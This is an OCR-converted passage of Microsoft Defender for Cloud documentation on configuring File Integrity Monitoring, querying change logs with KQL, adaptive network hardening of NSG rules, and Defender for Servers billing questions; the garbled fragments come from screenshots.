environment. By disabling FIM, you remove the Change Tracking solution from selected 
workspace. 


To disable FIM: 


1. From the File Integrity Monitoring dashboard for a workspace, select Disable. 


File Integrity Monitoring & x 
ad 


GO Settings O Refresh Y Fiter] E Disable | 


Total servers Total changes Change type Change catego EE PORE 
2 dii : EZ Learn more about File Integrity Monitoring & 
8 34 Files 0 Modified 0 
Registry 34 Mmmm Added 17 


Removed 17 B 


Servers Changes 


>? Search servers 


Name TA, Totalchanges ‘Ty Files Ty Registry TA, Last change Dr TA 
E vmtest 10 0 10 09/28/20, 5:40 PM 
E server16-test 8 0 8 09/28/20, 8:49 AM 
E vmsses000001 6 0 6 09/27/20, 8:35 PM 
EZ vmsses000000 6 0 6 09/29/20, 5:00 AM 
EZ vmsses000003 4 0 4 09/27/20, 9:28 PM 
E testing321 0 0 0 

EZ vmi 0 0 0 

EH vmsseso00002 0 0 0 


2. Select Remove. 


Monitor workspaces, entities, and files 


Audit monitored workspaces 


The File integrity monitoring dashboard displays for workspaces where FIM is enabled. 
The FIM dashboard opens after you enable FIM on a workspace or when you select a 
workspace in the file integrity monitoring window that already has FIM enabled. 


File Integrity Monitoring & x 


ad 


GO Settings © Refresh Y Filter E Disable 


Total servers Total changes Change type Change category LEARN MORE d E ZE 
Learn more about File Integrity Monitoring E 
8 34 Files 0 Modified 0 
Registry 34 B Added 17 B 


Removed 17 B 


Servers Changes 


| O Search servers 


Name ty Totalchanges îy Files TA, Registry Ty Last change tim.. 
E vmtest 10 0 10 09/28/20, 5:40 PM 
E serveri16-test 8 0 8 09/28/20, 8:49 AM 
EA 6 0 6 09/27/20, 8:35 PM 
E 6 0 6 09/29/20, 5:00 AM 
E vmsses000003 4 0 4 09/27/20, 9:28 PM 
E testing321 0 0 0 

EA vmi 0 0 0 

E vmssesoo0002 0 0 0 


The FIM dashboard for a workspace displays the following details: 


e Total number of machines connected to the workspace 

e Total number of changes that occurred during the selected time period 
e A breakdown of change type (files, registry) 

e A breakdown of change category (modified, added, removed) 


Select Filter at the top of the dashboard to change the time period for which changes 


are shown. 


Dashboard > Microsoft Defender for Cloud > File Integrity Monitoring Filter 


File Integrity Monitoring & 
ad 


GO Settings ed) Refresh] D Filter of Disable Time 
d (_) Last 30 Minutes 


() Last 1 Hour 


Total servers Total changes Change type Change category 
(_) Last 6 Hours 
a E bea b EZEREN, 6S O Last 24 Hours 
Registry 34 En | Added an (@) Last 7 Days 


© Last 30 Days 


Removed 17 B 


Servers Changes 


| b Search servers 


» 


Name TA, Total changes 4 Files TA 


EA vmtest 10 0 


The Servers tab lists the machines reporting to this workspace. For each machine, the 
dashboard lists: 


e Total changes that occurred during the selected period of time 
e A breakdown of total changes as file changes or registry changes 


When you select a machine, the query appears along with the results that identify the 
changes made during the selected time period for the machine. You can expand a 
change for more information. 


Dashboard > Microsoft Defender for Cloud > File Integrity Monitoring > File Integrity Monitoring 


d Logs 2 » x 
gd 
E New Query 1* x | 4+ © Feedback EZ Queries EZ Query explorer & M v 
® gd Select scope Spa | ( Time range: Custom ) Sae w E Share w ek Newalertrule = Export w e Pinto dashboard | = Format query 
a ae 1 ConfigurationChange 
Tables Queries Functions « 2 | where Computer == petzen 
3 | where ConfigChangeType in("Files", “Registry") 
D Search 4 | order by TimeGenerated 
5 | render table 
Y Filter ) IÆ Group by: Solution ~ 
TT Collapse all 
Favorites B R 
You can add favorites by clicking on Results Chart DU Columns v | © Display time (uTC+00:00) ~ = @__) Group columns 


the * icon 


Completed. Showing results from the custom time range. © 00:07.5 E 14records b 


SG 


Microsoft Sentinel 


> Change Tracking {UTC}... t Computer Y  ConfigChan: VY ChangeCategory Y SourceComputerid Y Registry Hive ValueName 
» LogManagement > 4/18/2021, 2:25:25.817 PM vmtest Registry Added 904ba38f-ca19-455... HKEY_LOCAL... HKEY_LOCAL.... \REGISTR 
» Security and Audit : > 4/18/2021, 3:14:49.153 PM vmtest Registry Removed 904ba38f-ca19-455... HKEY_LOCAL_... HKEY_LOCAL.... \REGISTR' 
£ SecurityCentorrres > 4/19/2021, 9:26:44,900 PM vmtest Registry Added 904ba38f-ca19-455... HKEY_LOCAL... HKEY_LOCAL.... \REGISTR 
> 4/9/2021, 9:26:44.900 EN vmtest Registry Added 904ba38f-ca19-455... HKEY_LOCAL.... HKEY_LOCAL... \REGISTR' 
> 4/19/2021, 10:15:57.737 BN vmtest Registry Removed 904ba38f-ca19-455... HKEY_LOCAL.... HKEY_LOCAL.... \REGISTR' 
> 4/9/2021, 10:15:57.737 BN vmtest Registry Removed 904ba38f-ca19-455..._ HKEY_LOCAL.... HKEY_LOCAL... \REGISTR' 
> 4/22/2021, 1:56:49.877 AN vmtest Registry Added 904ba38f-ca19-455... HKEY_LOCAL... HKEY_LOCAL.... \REGISTR' 
> 4/22/2021, 2:45:58.467 AN vmtest Registry Removed 904ba38f-ca19-455... HKEY_LOCAL.... HKEY_LOCAL... \REGISTR' 
> 4/24/2021, 6:26:44.633 AN vmtest Registry Added 904ba38f-ca19-455... HKEY_LOCAL... HKEY_LOCAL.... \REGISTRYV’ 
> 4/24/2021, 7:15:57.467 AN vmtest Registry Removed 904ba38f-ca19-455... HKEY_LOCAL..._ HKEY_LOCAL.... 
> 4/24/2021, 8:56:18.993 AN vmtest Registry Added 904ba38f-ca19-455... HKEY_LOCAL... HKEY_LOCAL.... 
HEE 
l4 4 Page 1 of1 > Pl 50 items per page 1-14 of 14 tems 


The Changes tab (shown below) lists all changes for the workspace during the selected 
time period. For each entity that was changed, the dashboard lists the: 


e Machine that the change occurred on 
e Type of change (registry or file) 
e Category of change (modified, added, removed) 


Date and time of change 


Dashboard > Microsoft Defender for Cloud > File Integrity Monitoring 


File Integrity Monitoring ~ x 


gd 


Ber) Settings oO Refresh Y Filter E Disable 


Total servers Total changes Change type Change catego: LEARN MORE 
e ZZ e Za Learn more about File Integrity Monitoring & 
8 50 Files 20 Modified 2 m 
Registry 48 B Added 24 B 
Removed 24 BO 
Servers 


Changes 


TA Server Ty Type ty Category Ty Change time Tau TA 

E HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\hivelist | \REGISTRYYMACHINE\COMPO.= vmtest Registry Removed 04/25/21, 06:15 AM 

r HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\hivelist | \REGISTRY\MACHINE\COMPO:-. vmtest Registry Added 04/25/21, 05:26 AM 

L HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\hivelist | \REGISTRY\MACHINE\DRIVERS server16-test Registry Removed 04/24/21, 04:43 PM 

EO HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\hivelist | \REGISTRY\MACHINE\DRIVERS — server16-test Registry Added 04/24/21, 03:53 PM 

EO HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\hivelist | \REGISTRY\MACHINE\DRIVERS vmtest Registry Removed 04/24/21, 12:45 PM 
Me HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\hivelist | \REGISTRY\MACHINE\DRIVERS vmtest Registry Added 04/24/21 
er HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\hivelist | \REGISTRY\MACHINE\DRIVERS vmtest Registry Removed 04/24/21) 

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\hivelist | \REGISTRY\MACHINE\DRIVERS vmtest Registry Added 04/24/21, 09:26 AM 


Change details opens when you enter a change in the search field or select an entity 


listed under the Changes tab. 


Dashboard > Microsoft Defender for Cloud > File Integrity Monitoring 


File Integrity Monitoring 
gd 


& Settings © Refresh Y Filter E Disable 
Total servers Total changes Change type 
8 50 Files 20 
Registry 49 Pr 
Servers 


Changes 


wu Presenting the latest 100 changes. Click here to view all changes in Log Analytic 


l D Search changes 


Entity 


SA 
EO HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\hivelist | \REGIS 


E HKEY LOCAL MACHINE\SYSTEM\CurrentControlSet\Control KE REGIS 


HEE HKEY_LOCAL_MACHINE\SYSTEM\CurrentContr 


‘ontrol\hivelist | \REGIS 


a 
ZO HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\hivelist | \REGIS 


Edit monitored entities 


Property 
SourceComputerld 
RegistryKey 
Hive 
ValueName 
ValueData 
ValueType 
Size 
Acls 
SourceSystem 
MG 
ManagementGroupName 
Tenantid 
VMUUID 


‘Unchanged properties 


Value Before 


HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\hivelist x 


Change details 


Value After 

904 
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\hivelist 
HKEY_LOCAL_MACHINE 

\REGISTRY\MACHINE\COMPONENTS, 
\Device\HarddiskVolume1\Windows\System32\config\COMPONENTS 
REG_SZ 

59 

[{ "Name": "owner" "Value": "BUILTIN\\Administrators" } { "Name": "Group" "Value": "NT... 
Ops 

00000000-0000-0000-0000-000000000001 

AOI 

552 


99b 


TE 


1. From the File Integrity Monitoring dashboard for a workspace, select Settings 


from the toolbar. 


Dashboard > Microsoft Defender for Cloud 


File Integrity Monitoring 


defaultworkspace-d 


GO Settings oO Refresh Y Filter E Disable 


d 


File Integrity Monitoring 


Total servers Total changes Change type Change category eluate ; ; d 
Learn more about File Integrity Monitoring & 
5 0 Files 0 Modified 0 
Registry 0 Added 0 
Removed 0 
Servers Changes 
| P Search servers 
Name Ty, Totalchanges Ty Files Ty Registry îy Last change time [Local] Ty 
EA esti 0 0 0 
be aks-agentpool-4 0 0 0 
EA aks-a 0 0 0 
ba aks-agent 0 0 0 
E Traffic 0 0 0 A 


Workspace Configuration opens with tabs for each type of element that can be 


monitored: 


e Windows registry 


Windows files 


Linux Files 


File content 


Windows services 


Each tab lists the entities that you can edit in that category. For each entity listed, 
Defender for Cloud identifies whether FIM is enabled (true) or not enabled (false). 
Edit the entity to enable or disable FIM. 


Dashboard > Microsoft Defender for Cloud > File Integrity Monitoring > File Integrity Monitoring 


Workspace Configuration 
Change Tracking 


+ Add © Documentation 


Group Enabled Registry Key Recursive 
Recommended false HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVer... true 
Recommended false HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\inter... true 
Recommended false HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Wind... true 
Recommended false HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Wind... true 
Recommended false HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Wind... true 
Security true HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID... false 
Security true HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID... false 
Security true HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Curre... false 
Security true HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Curre... false 
Security true HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Curre... false 
Security true HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentV... false 


2. Select an entry from one of the tabs and edit any of the available fields in the Edit 
for Change Tracking pane. Options include: 


Enable (True) or disable (False) file integrity monitoring 


Provide or change the entity name 


Provide or change the value or path 


Delete the entity 


3. Discard or save your changes. 


Add a new entity to monitor 


1. From the File Integrity Monitoring dashboard for a workspace, select Settings 
from the toolbar. 


The Workspace Configuration opens. 
2. On the Workspace Configuration: 


a. Select the tab for the type of entity that you want to add: Windows registry, 
Windows files, Linux Files, file content, or Windows services. 


b. Select Add. 


In this example, we selected Linux Files. 


Dashboard > Microsoft Defender for Cloud > File Integrity Monitoring > File Integrity Monitoring 


Workspace Configuration 


Windows Registry Windows Files File Content Windows Services 


Group Enabled Path Type Links Recursive Sudo Upload file TZ. 


Recommended true /etc/*.conf File Follow true true 100 


3. Select Add. Add for Change Tracking opens. 


4. Enter the necessary information and select Save. 


Folder and path monitoring using wildcards 


Use wildcards to simplify tracking across directories. The following rules apply when you 
configure folder monitoring using wildcards: 


e Wildcards are required for tracking multiple files. 

e Wildcards can only be used in the last segment of a path, such as C:\folder\file 
or /etc/*.conf 

e |f an environment variable includes a path that isn't valid, validation succeeds but 
the path fails when inventory runs. 

e When setting the path, avoid general paths such as c:\*.*, which results in too 


many folders being traversed. 


Compare baselines using File Integrity 
Monitoring 


File Integrity Monitoring (FIM) informs you when changes occur to sensitive areas in 
your resources, so you can investigate and address unauthorized activity. FIM monitors 


Windows files, Windows registries, and Linux files. 


Enable built-in recursive registry checks 


The FIM registry hive defaults provide a convenient way to monitor recursive changes 
within common security areas. For example, an adversary may configure a script to 
execute in LOCAL_SYSTEM context by configuring an execution at startup or shutdown. 
To monitor changes of this type, enable the built-in check. 


Recommended false HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Group Policy\Scripts\Shutdown 
Recommended false HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Group Policy\Scripts\Startup 
Recommended false HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Extensions 

© Note 


Recursive checks apply only to recommended security hives and not to custom 
registry paths. 


Add a custom registry check 


FIM baselines start by identifying characteristics of a known-good state for the 
operating system and supporting application. For this example, we'll focus on the 
password policy configurations for Windows Server 2008 and higher. 


Policy Name Registry Setting 


Domain controller: Refuse MACHINE\System\CurrentControlSet\Services 


machine account password 
changes 


Domain member: Digitally 
encrypt or sign secure channel 
data (always) 


Domain member: Digitally 
encrypt secure channel data 
(when possible) 


Domain member: Digitally sign 
secure channel data (when 
possible) 


Domain member: Disable 
machine account password 


\Netlogon\Parameters\RefusePasswordChange 


MACHINE\System\CurrentControlSet\Services 
\Netlogon\Parameters\RequireSignOrSeal 


MACHINE\System\CurrentControlSet\Services 
\Netlogon\Parameters\SealSecureChannel 


MACHINE\System\CurrentControlSet\Services 
\Netlogon\Parameters\SignSecureChannel 


MACHINE\System\CurrentControlSet\Services 
\Netlogon\Parameters\DisablePasswordChange 


PariegeName Registry Setting 


Domain member: Maximum MACHINE\System\CurrentControlSet\Services 
machine account password age \Netlogon\Parameters\MaximumPasswordAge 


Domain member: Require strong ©MACHINE\System\CurrentControlSet\Services 
(Windows 2000 or later) session \Netlogon\Parameters\RequireStrongKey 
key 


Network security: Restrict NTLM: »§ MACHINE\System\CurrentControlSet\Services 
NTLM authentication in this \Netlogon\Parameters\RestrictNTLMInDomain 
domain 


Network security: Restrict NTLM: |» MACHINE\System\CurrentControlSet\Services 
Add server exceptions in this \Netlogon\Parameters\DCAllowedNTLMServers 
domain 


Network security: Restrict NTLM: ©» MACHINE\System\CurrentControlSet\Services 

Audit NTLM authentication in \Netlogon\Parameters\AuditNTLMInDomain 

this domain 
© Note 
To learn more about registry settings supported by various operating system 
versions, refer to the Group Policy Settings reference spreadsheet Z. 


To configure FIM to monitor registry baselines: 


1. In the Add Windows Registry for Change Tracking window, select the Windows 
Registry Key text box. 


2. Enter the following registry key: 
reg 


HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Netlogon\Parameter 
S 


Dashboard > Microsoft Defender for Cloud > File Integrity Monitoring > File Integrity Mon Add Windows Registry for Ch x 
Warkspace Configuration 


Ch racking X Discard © 


EZ Documentation 
Enabled 


GD Se 


Windows Registry | Windows Files Linux Files File Content Windows Services 


* 
Gro! ab... Registry Key Recu... ew 


Enter a name for the item 


Group 


| Custom 


Windows Registry Key * 


HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Netl 
ogon\Parameters I 


Track changes to Windows files 


1. In the Add Windows File for Change Tracking window, in the Enter path text box, 
enter the folder that contains the files that you want to track. In the example in the 
following figure, Contoso Web App resides in the D:\ drive within the 
ContosWebApp folder structure. 


2. Create a custom Windows file entry by providing a name of the setting class, 
enabling recursion, and specifying the top folder with a wildcard (*) suffix. 


Dashboard > Microsoft Defender for Cloud File Integrity Monitoring > File Integrity Mon Add Windows File for Change x 
Workspace Configuration 
Change Tracking x Discard 


EZ Documentation Enabled 


False) 
Windows Files MB 


Grou... Enab... Path 


lows Registry Linux Files File Content Windows Services 


Item Name * 


Type 


Enter a name for the item 


No results 


Group 


Custom 


Enter Path * 


Enter Path 


Path Type 


File 


Recursion 


Upload file content 


True False j 


Retrieve change data 


File Integrity Monitoring data resides within the Azure Log 
Analytics/ConfigurationChange table set. 


1. Set a time range to retrieve a summary of changes by resource. 


In the following example, we're retrieving all changes in the last 14 days in the 


categories of registry and files: 


ConfigurationChange 

| where TimeGenerated > ago(14d) 

| where ConfigChangeType in ('Registry', 'Files') 
| summarize count() by Computer, ConfigChangeType 


2. To view details of the registry changes: 
a. Remove Files from the where clause. 
b. Remove the summarization line and replace it with an ordering clause: 


ConfigurationChange 

| where TimeGenerated > ago(14d) 

| where ConfigChangeType in ('Registry') 
| order by Computer, RegistryKey 


Reports can be exported to CSV for archival and/or channeled to a Power BI report. 


contosoretail-it = Time range: Set in query 


ə  ConfigurationChange 
| where TimeGenerated > ago(14d) 
| where ConfigChangeType in (‘Registry’) 
| order by Computer, RegistryKey 


Export to CSV - All Columns 


Export to CSV - Displayed Columns 


Export to Power BI (M Query) 
©” 00:00:01 


Completed 
SETABLE wllCHART Columns v 


Drag a column header and drop it here to group by that column 


Computer Yy ConfigChangeType Y ChangeCategory Y SourceComputerld Y SoftwareType Y SoftwareName Y Previo 
> retailEUS3 Registry Modified 4152690f-b8ff-47f9-9420-7dd4def8fe14 
> retailEUS3 Registry Modified 4152690f-b8ff-47f9-9420-7dd4def8fe14 
> retailEUS3 Registry Modified 4152690f-b8ff-47f9-9420-7dd4def8fe14 
> retailEUS3 Registry Modified 4152690f-b8ff-47f9-9420-7dd4def8fe14 
> retailEUS3 Registry Modified 4152690f-b8ff-47f9-9420-7dd4def8fe14 
wv retailEUS3 Registry Modified 4152690f-b8ff-47f9-9420-7dd4def8fe14 
Computer retailEUS3 
ConfigChangeType Registry 
Lha DICO Die _-Madified.. 


Next steps 


Learn more about Defender for Cloud in: 


e Setting security policies - Learn how to configure security policies for your Azure 


subscriptions and resource groups. 


e Managing security recommendations - Learn how recommendations help you 
protect your Azure resources. 
e Azure Security blog’ - Get the latest Azure security news and information. 


Improve your network security posture 
with adaptive network hardening 


Article e 06/19/2023 


Adaptive network hardening is an agentless feature of Microsoft Defender for Cloud - 
nothing needs to be installed on your machines to benefit from this network hardening 
tool. 


This page explains how to configure and manage adaptive network hardening in 
Defender for Cloud. 


Availability 


Aspect Details 

Release state: General availability (GA) 

Pricing: Requires Microsoft Defender for Servers Plan 2 
Required roles and permissions: Write permissions on the machine’s NSGs 
Clouds: @ commercial clouds 


* National (Azure Government, Azure China 21Vianet) 
* Connected AWS accounts 


What is adaptive network hardening? 


Applying network security groups (NSG) to filter traffic to and from resources, improves 
your network security posture. However, there can still be some cases in which the 
actual traffic flowing through the NSG is a subset of the NSG rules defined. In these 
cases, further improving the security posture can be achieved by hardening the NSG 
rules, based on the actual traffic patterns. 


Adaptive network hardening provides recommendations to further harden the NSG 
rules. It uses a machine learning algorithm that factors in actual traffic, known trusted 
configuration, threat intelligence, and other indicators of compromise, and then 
provides recommendations to allow traffic only from specific IP/port tuples. 


For example, let's say the existing NSG rule is to allow traffic from 140.20.30.10/24 on 
port 22. Based on traffic analysis, adaptive network hardening might recommend 
narrowing the range to allow traffic from 140.23.30.10/29, and deny all other traffic to 


that port. For the full list of supported ports, see the common questions entry Which 


ports are supported?. 


View hardening alerts and recommended rules 


1. From Defender for Cloud's menu, open the Workload protections dashboard. 


2. Select the adaptive network hardening tile (1), or the insights panel item related to 


adaptive network hardening (2). 


9 Microsoft Defender for Cloud | Workload protections 


Y Subscriptions C What's new 


“N 


Defender for Cloud coverage 
Enable adaptive application 


EA 385/394 d 34/34 d 14m GO 85 es ® 1167m controls 


Servers Kubernetes Container registries App Service Key Vault 


Upgrade 


E EO 
E, GO ea == 417/446 EA 23:24 OO 23 24 
B eae Azure SQL databas... Storage Resource Manager .. DNS subscriptions 
3.7%) Insta <a eee 
Not %) Upgrade all Upgrade Upgrade Upgrade Upgrade 


Enable adaptive network 


hardening 
Security alerts 


Ad etwor 
5 hari 

enabled on 90% 

” - ive 
rdenin 

Low severity 

| | 788 reduces tl ittack 
Connect Defender for Cloud 


to Sentinel 


Advanced protection 


EZ VM vulnerability assessment EA Adaptive applicati trol or 
149 Unprotected 50 une < o 
dee 
E, SQL vulnerability assessment [A File integrity monitoring k Network map a | d 
10 Unprotected < 
Ọ Tip 


The insights panel shows the percentage of your VMs currently defended with 
adaptive network hardening. 


3. The details page for the Adaptive Network Hardening recommendations should 
be applied on internet facing virtual machines recommendation opens with your 
network VMs grouped into three tabs: 


e Unhealthy resources: VMs that currently have recommendations and alerts 
that were triggered by running the adaptive network hardening algorithm. 

e Healthy resources: VMs without alerts and recommendations. 

e Unscanned resources: VMs that the adaptive network hardening algorithm 
cannot be run on because of one of the following reasons: 
o VMs are Classic VMs: Only Azure Resource Manager VMs are supported. 


o Not enough data is available: In order to generate accurate traffic 
hardening recommendations, Defender for Cloud requires at least 30 days 
of traffic data. 

o VM is not protected by Microsoft Defender for Servers: Only VMs 
protected with Microsoft Defender for Servers are eligible for this feature. 


Adaptive Network Hardening recommendations x 


should be applied on internet facing virtual machines 


Severity Freshness interval 


| High ® 24 Hours 


vw Description 
Y Remediation steps 


^ Affected resources 


Unhealthy resources (7) Healthy resources (80) Not applicable resources (16) 


| Ø Search virtual machines | 


[_] Name y Subscription 

O EA vvs ASC DEMO 

O vm ASC DEMO 

O A m: ASC DEMO 

I EA contosowebt Contoso IT - demo 
CJ HA contososaisvr3 Contoso IT - demo 
TI HA contososaisrvi Contoso IT - demo 
TI HO co-retaivoot Contoso Hotels 


4. From the Unhealthy resources tab, select a VM to view its alerts and the 
recommended hardening rules to apply. 


e The Rules tab lists the rules that adaptive network hardening recommends 
you add 

e The Alerts tab lists the alerts that were generated due to traffic, flowing to 
the resource, which is not within the IP range allowed in the recommended 


rules. 


5. Optionally, edit the rules: 


e Modify a rule 
e Delete a rule 
e Add a rule 


6. Select the rules that you want to apply on the NSG, and select Enforce. 


Q Tip 


If the allowed source IP ranges shows as 'None', it means that recommended 


rule is a deny rule, otherwise, it is an allow rule. 


Manage Adaptive Network Hardening recommendations & 


DockerOnlaaSDemo 


+ Add rule 
Recommended rules Total alerts New alerts 
15 59 Dr, 


Rules Alerts 


O Search rules 
@ Type Name T4 Destination port TA Allowed Source IP Ranges Ty, Protocol Ty Total Alerts TA 


@ A System Generated 22 None TCP 5 


eo 


O Note 


The enforced rules are added to the NSG(s) protecting the VM. (A VM could 
be protected by an NSG that is associated to its NIC, or the subnet in which 
the VM resides, or both) 


Modify a rule 


You may want to modify the parameters of a rule that has been recommended. For 
example, you may want to change the recommended IP ranges. 


Some important guidelines for modifying an adaptive network hardening rule: 
e You cannot change allow rules to become deny rules. 
e You can modify the parameters of allow rules only. 


Creating and modifying "deny" rules is done directly on the NSG. For more 
information, see Create, change, or delete a network security group. 


e A Deny all traffic rule is the only type of "deny" rule that would be listed here, and 
it cannot be modified. You can, however, delete it (see Delete a rule). To learn 
about this type of rule, see the common questions entry When should | use a 
"Deny all traffic" rule?. 


To modify an adaptive network hardening rule: 


1. To modify some of the parameters of a rule, in the Rules tab, select on the three 
dots (...) at the end of the rule's row, and select Edit. 


Home > Microsoft Defender for Cloud - Overview > Networking > Harden Network Security Group rules of internet facing virtual machines > Manage Adaptive Network Hardening recommendations 


Manage Adaptive Network Hardening recommendations 


| Recommended rules Total alerts New alerts 


43 2 -- Q, 


Rules Alerts 


DO TYPE NAME DESTINATION PORT ALLOWED SOURCE IP RANGES PROTOCOL ALERTS 
{v A 2 N TS o 
A 1128 Non Tce 7 
A MicrosoftDefenderforCloud-ANCRule_3389_TCP_Inbound_ALLOW_1551874842891 3389 67.220.196.24 TCP 0 
e 
we A CM 0 180.212.35.10/3 TCP/UDI 
Enforce 


2. In the Edit rule window, update the details that you want to change, and select 
Save. 


O Note 


After selecting Save, you have successfully changed the rule. However, you 
have not applied it to the NSG. To apply it, you must select the rule in the list, 
and select Enforce (as explained in the next step). 


Home > Microsoft Defender for Cloud - Overview > Networking > Harden Network Security Group rules of internet facing virtual machines > Manage Adaptive Network Hardening recommendations > Edit rule 


icy x Edit rule ox 


DESTINATION PORT ALLOWED SOURCE IP RANGES PROTOCOL pe 
N TCP d 
N TCP 0 
N TCP 0 
N TCP 
None TCP 0 
128 None 
389_TCP_Inbound_ALLOW_1552212663373 3389 167.220.196.245 hed o 


3. To apply the updated rule, from the list, select the updated rule and select Enforce. 


Rules Alerts 


| D Search rules 


|m TYPE 


A System Generated 


System Generated 


g) 
AA p Rule1 
BE 


Add a new rule 


You can add an "allow" rule that was not recommended by Defender for Cloud. 


O Note 


Only "allow" rules can be added here. If you want to add "deny" rules, you can do 
so directly on the NSG. For more information, see Create, change, or delete a 
network security group. 


To add an adaptive network hardening rule: 


1. From the top toolbar, select Add rule. 


Home > Microsoft Defender for Cloud - Overview > Networking > Harden Network Security Group rules of internet facing virtual machines > Manage adaptive network hardening recommen dations 


Manage adaptive network hardening recommendations 


| Recommended rules Total alerts New alerts 


43 2 --& 


Rules Alerts 


oO TYPE NAME DESTINATION PORT ALLOWED SOURCE IP RANGES PROTOCOL ALERTS 
GA A System Generated 22 None TS o 
A System Generated 1128 None TS 
A MicrosoftDefenderforCloud-ANCRule_3389_TCP_Inbound_ALLOW_1551874842891 3389 167.220.196.245 MEA 0 
Z 
ZL Allow_DC_Manager 5506 180.212.35.10/30 TCP/UDP o 


2. In the New rule window, enter the details and select Add. 


O Note 


After selecting Add, you have successfully added the rule, and it is listed with 
the other recommended rules. However, you have not applied it on the NSG. 
To activate it, you must select the rule in the list, and select Enforce (as 
explained in the next step). 


3. To apply the new rule, from the list, select the new rule and select Enforce. 


Rules Alerts 


System Generated 


System Generated 


Rule 


Delete a rule 


When necessary, you can delete a recommended rule for the current session. For 


example, you may determine that applying a suggested rule could block legitimate 
traffic. 


To delete an adaptive network hardening rule for your current session: 


e |n the Rules tab, select the three dots (...) at the end of the rule's row, and select 
Delete. 


Manage Adaptive Network Hardening recommendations 
PrefServer 


eP Add rule 


Recommended rules Total alerts New alerts 


45 2 --& 


Rules Alerts 


Home > Microsoft Defender for Cloud - Overview > Networking > Harden Network Security Group rules of internet facing virtual machines > Manage Adaptive Network Hardening recommendations 


D Search rul 
NAME DESTINATION PORT 
System Generated 22 
| System Generated 1128 
| MicrosoftDefenderforCloud-ANCRule_3389_TCP_Inbound_ALLOW_1551874842891 3389 
| Allow_DC_Manager 5506 


ALLOWED SOURCE IP RANGES 


None 


None 


167.220.196.245 


180.212.35.10/30 


PROTOCOL 


TCP 


Te 


ied 


TCP/UDP 


2 Delete 


Next steps 


e View common question about adaptive network hardening 


Common questions about 
Defender for Servers 


FAQ 


Get answers to common questions about Microsoft Defender for Servers. 


Can | enable Defender for Servers ona 
subset of machines in a subscription? 


No. When you enable Microsoft Defender for Servers on an Azure subscription or ona 
connected AWS account or GCP project, all connected machines are protected by 
Defender for Servers. Servers that don't have the Log Analytics agent or Azure Monitor 
agent installed are also protected. 


Can | get a discount if | already have a 
Microsoft Defender for Endpoint 
license? 


If you already have a license for Microsoft Defender for Endpoint for Servers, you won't 
have to pay for that part of your Microsoft Defender for Servers Plan 1 or 2 license. 


To request your discount, contact the Defender for Cloud support team through the 
Azure portal by creating a new support request in the help and support center. 


1. Sign in to the Azure portal £. 


2. Select Support and Troubleshooting 


3. Select Help + support. 
4. Select Create a support request. 


5. Enter the following information: 


Home > Help + support > Help + support > 
New support request 
1. Problem description 


Tell us your issue, and we'll help you resolve it. 


Provide information about your billing, subscription, quota management, or technical issue (including requests for technical 


advice). 
Summary * Requesting for Defender for servers P2 discount based on MDE for servers... v | 
Issue type * Technical Vv | 
Subscription * <Your subscription> v | 
Can't find your subscription? Show more © 

Service O) My services O All services 

Service type * Microsoft Defender for Cloud v 
Problem type * Pricing, Billing and Usage v 
Problem subtype * Discount request for MDE integration Vv 


Next 


6. Select Next. 
7. Select Next. 


8. In the Additional details tab, enter your Customer Org name, Tenant ID, the 
number of Microsoft Defender for Endpoint for Servers licenses that were 
purchased, the expiration date of the Microsoft Defender for Endpoint for Servers 
licenses that were purchased, and all other required fields. 


9. Select Next. 


10. Select Create. 


O Note 


The discount becomes effective starting on the approval date. The discount isn't 


retroactive. 


What servers do I pay for ina 
subscription? 


When you enable Defender for Servers on a subscription, you're charged for all 


machines based on their power states. 


Azure VMs: 

State Details 

Starting VM starting up. 

Running Normal working state. 

Stopping Transitional. Moves to Stopped state when finished. 

Stopped VM shut down from within guest OS or by using PowerOff 
APIs. Hardware is still allocated, and the machine remains on 
the host. 

Deallocating Transitional. Moves to Deallocated state when finished. 

Deallocated VM stopped and removed from the host. 


Azure Arc machines: 


State Details 
Connecting Servers connected, but heartbeat not yet received. 
Connected Receiving regular heartbeat from Connected 


Machine agent. 


Offline/Disconnected No heartbeat received in 15-30 minutes. 


Expired If disconnected for 45 days, status might change 
to Expired. 


Billing 


Not 
billed 


Billed 


Billed 


Billed 


Not 
billed 


Not 
billed 


Billing 


Not 
billed 


Billed 


Not 
billed 


Not 
billed 


Do | need to enable Defender for 
Servers on the subscription and on the 
workspace? 


Defender for Servers Plan 1 doesn't depend on Log Analytics. When you enable 
Defender for Servers Plan 2 at the subscription level, Defender for Cloud automatically 
enables the plan on your default Log Analytics workspaces. If you use a custom 
workspace, make sure you enable the plan on the workspace. Here's more information: 


e If you turn on Defender for Servers for a subscription and for a connected custom 
workspace, you aren't charged for both. The system identifies unique VMs. 
e |f you enable Defender for Servers on cross-subscription workspaces: 

o For the Log Analytics agent, connected machines from all subscriptions are 
